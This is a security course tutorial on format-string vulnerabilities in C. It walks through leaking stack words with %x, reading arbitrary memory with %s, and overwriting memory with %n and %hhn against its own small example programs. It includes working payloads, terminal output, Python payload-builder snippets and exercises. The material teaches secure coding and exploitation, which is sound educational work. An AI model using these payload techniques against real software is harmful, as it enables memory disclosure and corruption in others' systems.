Format strings

We now study another classic program exploitation technique. A format string is a string containing format directives such as %d and %s in printf. These directives are interpreted and substituted with appropriate values. For example:

printf("Result: %d",r);

substitutes %d with the value of integer variable r and prints the resulting string.

A classic mistake is to directly print a string s without specifying a format. A string should always be printed as follows:

printf("%s", s);

Consider now the following piece of code, where the string buffer is printed directly, without specifying a format "%s":

#include <stdio.h>

int main(void) {
    char buffer[128];

    printf("Please insert a string: ");
    /* no buffer overflow! */
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);

    return 0;
}

Printing a string this way is a security vulnerability: if we provide, as input, strings containing format directives, these will be interpreted and will leak (and possibly modify) memory values. We show some examples below.

$ gcc format.c -o format
format.c: In function ‘main’:
format.c:9:5: warning: format not a string literal and no format arguments [-Wformat-security]
$ ./format 
Please insert a string: ciao
ciao
$ ./format
Please insert a string: ciao.%08x
ciao.00000080
$ ./format
Please insert a string: ciao.%08x.%08x.%08x
ciao.00000080.b7fd1c20.b7fff900

First notice that the compiler raises a security warning regarding the direct printf of a string. Programmers should always take this warning seriously and fix the issue.

Let us now analyse what is happening. The call to printf in the program interprets %08x as a format directive and prints, in hexadecimal and padded with zeros up to 8 digits, the first parameter that follows the format string. The problem is that no such parameter was passed! On 32-bit x86, parameters are pushed on the stack just before calling a function, so printf simply reads the words where its parameters would have been. Those words belong to the stack of the calling function, as depicted below:

saved ebp (calling function)
return address (calling function)
first parameter
second parameter
….

So, if we keep adding format directives we can print the whole stack of the calling function. Since the string we are printing is stored on the stack in the buffer array, if we print enough words we will sooner or later find it. A trick to spot the string immediately is to prepend an easily recognizable pattern such as the “classic” AAAA (41414141 in hexadecimal), as shown in the following example:

$ python -c 'print "AAAA" + ".%08x"*8'
AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
$ python -c 'print "AAAA" + ".%08x"*8' | ./format 
Please insert a string: AAAA.00000080.b7fd1c20.b7fff900.00000000.b7fff800.252d465a.41414141.3830252e

It is easy to see the word containing 41414141, which is the beginning of our string.
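Locating the marker can also be automated. The following is a minimal Python 3 sketch, assuming the leaked line has the dot-separated shape shown above (with the "Please insert a string: " prompt already removed); the helper name find_marker_index is hypothetical and not part of the original material.

```python
def find_marker_index(leak: str, marker: str = "41414141") -> int:
    """Return the 1-based position of `marker` among the leaked stack words.

    Assumption: `leak` looks like "AAAA.00000080.b7fd1c20...", i.e. a literal
    prefix followed by dot-separated 8-digit hexadecimal words.
    """
    fields = leak.strip().split(".")
    words = fields[1:]  # drop the literal "AAAA" prefix
    return words.index(marker) + 1  # raises ValueError if the marker is absent


leak = ("AAAA.00000080.b7fd1c20.b7fff900.00000000."
        "b7fff800.252d465a.41414141.3830252e")
print(find_marker_index(leak))  # prints 7
```

The returned position is the number to use in the direct parameter access described in the next section.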

Direct access to parameters

Once we know the position on the stack (in this case it is the seventh word on the stack) we can refer directly to the corresponding parameter as follows:

$ python -c 'print  "AAAA" + ".%7$08x"' | ./format 
Please insert a string: AAAA.41414141

The format %7$08x is like %08x but instead of printing the next parameter on the stack it prints the one specified before the dollar symbol, the seventh in this case. We can also print the same parameter more than once:

$  python -c 'print  "AAAA" + ".%7$08x.%7$08x"' | ./format 
Please insert a string: AAAA.41414141.41414141

Exercise

Try to reveal the content of the PIN array (containing a secret PIN) through a format string attack. Hint: Since the array is allocated on the stack, use %x and not %s.

#include <stdio.h>
#include <string.h>
 
int main(void) {
    char buffer[128];
    char PIN[128];

    strcpy(PIN,"1234");
        
    printf("Please insert a string: ");
    fgets(buffer, sizeof(buffer), stdin); // no buffer overflow!
    printf("%p, %p, \n",buffer,PIN);
    printf(buffer);
 
    return 0;
}

Printing arbitrary memory locations

Now that we know where our string is located on the stack we can do more. The format directive %s is used to print strings: the corresponding parameter on the stack is interpreted as the address of a string, and the string it points to is printed (the pointer is dereferenced!). This allows us to print a string at an arbitrary memory location: we replace AAAA with the target address and we place a %s in the format string at the position corresponding to the 41414141 output. printf will then interpret our address as a pointer to a string and will print the string starting at that address.

Exercise

Consider the following program and try to print the supersecret string using the technique discussed above.

#include <stdio.h>

const char supersecret[] = "This is a ultrasuperdupersecret string";

int main(int argc, char *argv[]) {
    char buffer[128];

    printf("Please insert a string: ");
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);

    return 0;
}

Notice that the string is NOT on the stack, thus it would never be printed by increasing the number of %x directives in the format string.

Hint: You can use objdump -D and/or gdb to find the string address.

Writing with format strings

So far, we have seen how to print the content of arbitrary memory locations. There are also format directives that modify memory, and we can try to exploit them to change the content of a memory address. In particular, we illustrate the %n directive, which stores the number of bytes written so far by printf into the integer variable whose address is passed as the corresponding parameter. Try the following example:

#include <stdio.h>

int main(void) {
    int n1,n2;

    printf("Number of bytes written up to this point%n are stored in n1 and the "
           "ones up to this point%n are stored in n2!\n", &n1, &n2);
    printf("n1: %i, n2: %i\n",n1,n2);
}

We obtain the following output:

$ ./a.out 
Number of bytes written up to this point are stored in n1 and the ones up to this point are stored in n2!
n1: 40, n2: 87
$

Using echo and wc we can double check that 40 and 87 are, in fact, the number of bytes written up to the point where the two %n are placed:

$ echo -n "Number of bytes written up to this point" | wc -c
40
$ echo -n "Number of bytes written up to this point are stored in n1 and the ones up to this point" | wc -c
87

Consider our previous example modified as follows:

#include <stdio.h>
 
const char supersecret[] = "This is a ultrasuperdupersecret string";
 
int main(int argc, char *argv[]) {
    char buffer[128];

    printf("Supersecret string is at the address %p and contains '%s', %08x\n",
       supersecret,supersecret,*(int *)supersecret);    
    printf("Please insert a string: ");
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);
    printf("Supersecret string is at the address %p and contains '%s', %08x\n",
       supersecret,supersecret,*(int *)supersecret); 
    return 0;
}

It prints the address, the string and the first four bytes of the string in hexadecimal notation, before and after the input of the format string (i.e., where the format string attack happens):

$ ./write_supersecret 
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: AAAA
AAAA
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854

We now know the address of the string, 0x08048640, and we can easily reproduce the attack that leaks the supersecret string on this particular code:

$ python -c 'print "AAAA" + ".%11$08x"' | ./write_supersecret 
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: AAAA.41414141
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854

$ python -c 'print "\x40\x86\x04\x08" + ".%11$s"' | ./write_supersecret                                                                    
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: .This is a ultrasuperdupersecret string
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
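The commands above use the Python 2 print statement. In Python 3 strings are Unicode, so printing "\x86" as text would typically emit two UTF-8 bytes instead of one, and the address has to be built as raw bytes. The following is a minimal sketch under that assumption; the helper name leak_payload is hypothetical, while the address and the parameter position 11 are taken from the transcript above.

```python
import struct


def leak_payload(address: int, index: int) -> bytes:
    """Build a payload that prints the string stored at `address`.

    `index` is the position of the payload's first word among the printf
    parameters (11 for write_supersecret in the transcript above).
    """
    # "<I" packs a 32-bit unsigned integer in little-endian byte order.
    directive = ".%" + str(index) + "$s\n"
    return struct.pack("<I", address) + directive.encode("ascii")


payload = leak_payload(0x08048640, 11)
print(payload)  # prints b'@\x86\x04\x08.%11$s\n'
```

To feed the raw bytes to the program, one option is to replace the final print with sys.stdout.buffer.write(payload) (after importing sys) and pipe the script's output into ./write_supersecret.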

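Now, if we replace %s with %n in the attack we should, in principle, be able to write to the string. Below we reach the eleventh parameter by consuming the first ten with %08x directives, so that the final %n uses the address at the start of our payload: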

$ python -c 'print "\x40\x86\x04\x08" + ".%08x"*10 + "%n"' | ./write_supersecret                                                           
Supersecret string is at the address 0x8048640 and contains 'This is a ultrasuperdupersecret string', 73696854
Segmentation fault

It did not work, and we get a segmentation fault error instead! To understand what is happening we examine the program sections with objdump -h:

$ objdump -h ./write_supersecret
./write_supersecret:     file format elf32-i386

Sections:
....
 12 .fini         00000014  080485f4  080485f4  000005f4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       000000a2  08048620  08048620  00000620  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame_hdr 0000002c  080486c4  080486c4  000006c4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
....

Our string is in the read-only section .rodata, which spans addresses 0x08048620 to 0x080486c2 (0x08048620 + 0xa2), hence the segmentation fault. In fact, we are declaring the variable as
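The range check can be written down explicitly. This is a small Python 3 sketch using the start address and size reported by objdump -h above; the helper name in_section is hypothetical.

```python
def in_section(address: int, vma: int, size: int) -> bool:
    """True if `address` lies in the section starting at `vma`, `size` bytes long."""
    return vma <= address < vma + size


RODATA_VMA, RODATA_SIZE = 0x08048620, 0xA2  # from the objdump -h output above
SUPERSECRET = 0x08048640                    # address printed by the program

print(hex(RODATA_VMA + RODATA_SIZE))                     # prints 0x80486c2
print(in_section(SUPERSECRET, RODATA_VMA, RODATA_SIZE))  # prints True
```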

const char supersecret[] = "This is a ultrasuperdupersecret string";

which is a constant char array. We need to remove the const modifier to make it writable:

char supersecret[] = "This is a ultrasuperdupersecret string";

Now the variable is in the read-write section .data, so the elements of the array can be modified:

$ ./write_supersecret_writable                             
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: AAAA
AAAA
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
$ objdump -h ./write_supersecret_writable
....
 21 .got.plt      00000020  0804a000  0804a000  00001000  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .data         00000047  0804a020  0804a020  00001020  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 23 .bss          00000008  0804a068  0804a068  00001067  2**2
                  ALLOC
....

We first check that the leak still works with the new address, then we try again to write to the string:

$ python -c 'print "\x40\xa0\x04\x08" + ".%11$s"' | ./write_supersecret_writable 
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: .This is a ultrasuperdupersecret string
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854

$ python -c 'print "\x40\xa0\x04\x08" + ".%11$n"' | ./write_supersecret_writable 
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: .
Supersecret string is at the address 0x804a040 and contains '', 00000005

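We did it! The %n directive has stored the number of bytes written so far, 5, as a four-byte integer (0x00000005) at the beginning of the string: the four bytes of the address \x40\xa0\x04\x08 plus the dot before %11$n. The string now starts with the unprintable byte 0x05 followed by a zero byte, which is why it appears empty.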
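The effect of this write can be reproduced offline. The sketch below is a Python 3 model of the memory contents, assuming a 32-bit little-endian target as in the transcripts; it does not run the vulnerable program.

```python
import struct

# The array as laid out in memory, including the terminating NUL byte.
original = b"This is a ultrasuperdupersecret string\x00"

# %n stores a 4-byte int; on x86 it is laid out in little-endian order.
written = struct.pack("<i", 5)  # b"\x05\x00\x00\x00"
patched = written + original[4:]

first_word = struct.unpack("<I", patched[:4])[0]
c_string = patched.split(b"\x00", 1)[0]  # bytes up to the first NUL

print(f"{first_word:08x}")  # prints 00000005
print(c_string)             # prints b'\x05'
```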

Notice that by declaring the variable as

char *supersecret = "This is a ultrasuperdupersecret string";

we would also get a segmentation fault error since, in this case, the string would be stored in the read-only section and only the pointer to it, named supersecret, would be modifiable.

Writing something useful

The technique becomes interesting if we can control what we write. An easy way to do this is to use a directive such as %100x, which writes at least 100 characters (the output is padded with spaces as needed to reach a width of 100). So if we want to write 0xbeef we can compute 0xbeef - 0x4 = 48875 and add a %48875x directive before the %11$n, so that the number written will be 48875 + 4 (the four bytes of the address). Let’s try it:

$ python -c 'print "\x40\xa0\x04\x08" + "%48875x%11$n"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @
....
                  80
Supersecret string is at the address 0x804a040 and contains '�', 0000beef

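It worked! We have written 0xbeef on the two low-order bytes of the word (the two high-order bytes are set to zero, since %n stores a full four-byte integer). Notice that the output is very long (0xbeef = 48879 bytes, in fact) and that it grows with the value we want to write. We can keep the output much shorter by writing one byte at a time.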
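The padding computation used for the single %n write can be sketched as follows in Python 3. The helper name width_for_n is hypothetical, and the sketch assumes that the value printed by %x needs no more characters than the computed width (always true here, since a 32-bit value has at most 8 hexadecimal digits).

```python
def width_for_n(target: int, already_written: int) -> int:
    """Field width such that already_written + width == target when %n runs."""
    if target <= already_written:
        raise ValueError("target must exceed the bytes already written")
    return target - already_written


# 4 = the address bytes at the start of the payload.
width = width_for_n(0xBEEF, 4)
print(width)              # prints 48875
print(f"%{width}x%11$n")  # prints %48875x%11$n
```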

Example

We show how to write 0xfeedbeef byte by byte little-endian as 0xef 0xbe 0xed 0xfe.

To write four bytes we can put the four addresses one after the other and refer to them using the direct parameter access trick above. We also use the hh length modifier before the n to indicate that we are writing a half-half-word, i.e., a single byte.

$ python -c 'print "\x40\xa0\x04\x08\x41\xa0\x04\x08\x42\xa0\x04\x08\x43\xa0\x04\x08" + "%11$hhn%12$hhn%13$hhn%14$hhn"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @ABC�
Supersecret string is at the address 0x804a040 and contains ' is a ultrasuperdupersecret string', 10101010

Good! We have written 0x10, which is 16 in decimal, on each of the four bytes. In fact, the payload now starts with 4 addresses of 4 bytes each, which gives 16 written bytes, and the four hhn directives write 16 to the corresponding addresses.

To write 0xef 0xbe 0xed 0xfe we now have to compute how much padding we need to insert before the respective hhn directives.
We start from the first byte. We can do the math in a Python shell as follows:

>>> 0xef - 0x10
223

We thus add a %223x directive before the %11$hhn:

$ python -c 'print "\x40\xa0\x04\x08\x41\xa0\x04\x08\x42\xa0\x04\x08\x43\xa0\x04\x08" + "%223x%11$hhn%12$hhn%13$hhn%14$hhn"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @ABC
...
80
Supersecret string is at the address 0x804a040 and contains ' is a ultrasuperdupersecret string', efefefef

It works! We have written 0xef on the four bytes. We can now go on computing the padding to write the second byte.

>>> 0xbe - 0xef
-49

Uh! The second byte is supposed to be 0xbe, which is less than 0xef, and the count of written bytes can only grow. No problem: in order to write 0xbe we can in fact write 0x1be, since the hhn directive only stores the low-order byte, i.e., 0xbe.

Thus for the following three bytes we have:

>>> 0x1be - 0xef
207
>>> 0xed - 0xbe
47
>>> 0xfe - 0xed
17
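The wrap-around used above amounts to arithmetic modulo 256. A short Python 3 sketch of this observation follows; the helper name stored_by_hhn is hypothetical and only models the truncation performed by the hhn directive.

```python
def stored_by_hhn(count: int) -> int:
    """Value stored by %hhn: the low-order 8 bits of the running byte count."""
    return count & 0xFF


print(hex(stored_by_hhn(0x1BE)))  # prints 0xbe
print((0xBE - 0xEF) % 256)        # prints 207
print((0xED - 0x1BE) % 256)       # prints 47
print((0xFE - 0x1ED) % 256)       # prints 17
```

Taking each difference modulo 256 gives the padding directly, without having to add the extra 0x100 by hand.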

Now we can directly add %207x, %47x, %17x before %12$hhn, %13$hhn, %14$hhn, respectively.

$ python -c 'print "\x40\xa0\x04\x08\x41\xa0\x04\x08\x42\xa0\x04\x08\x43\xa0\x04\x08" + "%223x%11$hhn%207x%12$hhn%47x%13$hhn%17x%14$hhn"' | ./write_supersecret_writable
Supersecret string is at the address 0x804a040 and contains 'This is a ultrasuperdupersecret string', 73696854
Please insert a string: @ABC
...
Supersecret string is at the address 0x804a040 and contains '� is a ultrasuperdupersecret string', feedbeef

Good, we did it!
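The manual steps of this example can be collected into a small payload builder. This is a hedged Python 3 sketch, not a general-purpose tool: the function name hhn_payload is hypothetical, it assumes a 32-bit little-endian target, and it assumes that the payload's first word sits at parameter position first_index (11 in the transcripts above). Paddings between 1 and 7 are increased by 256 as a precaution, since %x may print up to 8 hexadecimal digits regardless of a smaller width.

```python
import struct


def hhn_payload(address: int, value: int, first_index: int) -> bytes:
    """Build a payload that writes the 32-bit `value` at `address` via four %hhn."""
    # Four consecutive byte addresses, each packed as a little-endian word.
    payload = b"".join(struct.pack("<I", address + i) for i in range(4))
    written = len(payload)  # 16 bytes are printed before the first directive

    # Iterate over the bytes of `value` in little-endian (memory) order.
    for i, byte in enumerate(struct.pack("<I", value)):
        pad = (byte - written) % 256
        if 0 < pad < 8:
            pad += 256  # keep the width >= 8 so %x prints exactly `pad` chars
        if pad:
            payload += f"%{pad}x".encode("ascii")
            written += pad
        payload += f"%{first_index + i}$hhn".encode("ascii")
    return payload


payload = hhn_payload(0x0804A040, 0xFEEDBEEF, 11)
print(payload[16:].decode("ascii"))
# prints %223x%11$hhn%207x%12$hhn%47x%13$hhn%17x%14$hhn
```

The directives printed here match the ones derived by hand above. The returned payload has no trailing newline, which the print statement in the shell commands adds automatically.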

Exercise 1

Write 0xdeadbeef on the four bytes of the string.

Exercise 2

Write 0xdeadbeef again, this time using the hn directive, which writes a half-word, i.e., 2 bytes. In this variant you only need two %hn directives and the two addresses of the half-words.

Exercise 3

Write “beef” at the beginning of the string so as to overwrite “This”. Try also to terminate the string right after “beef”.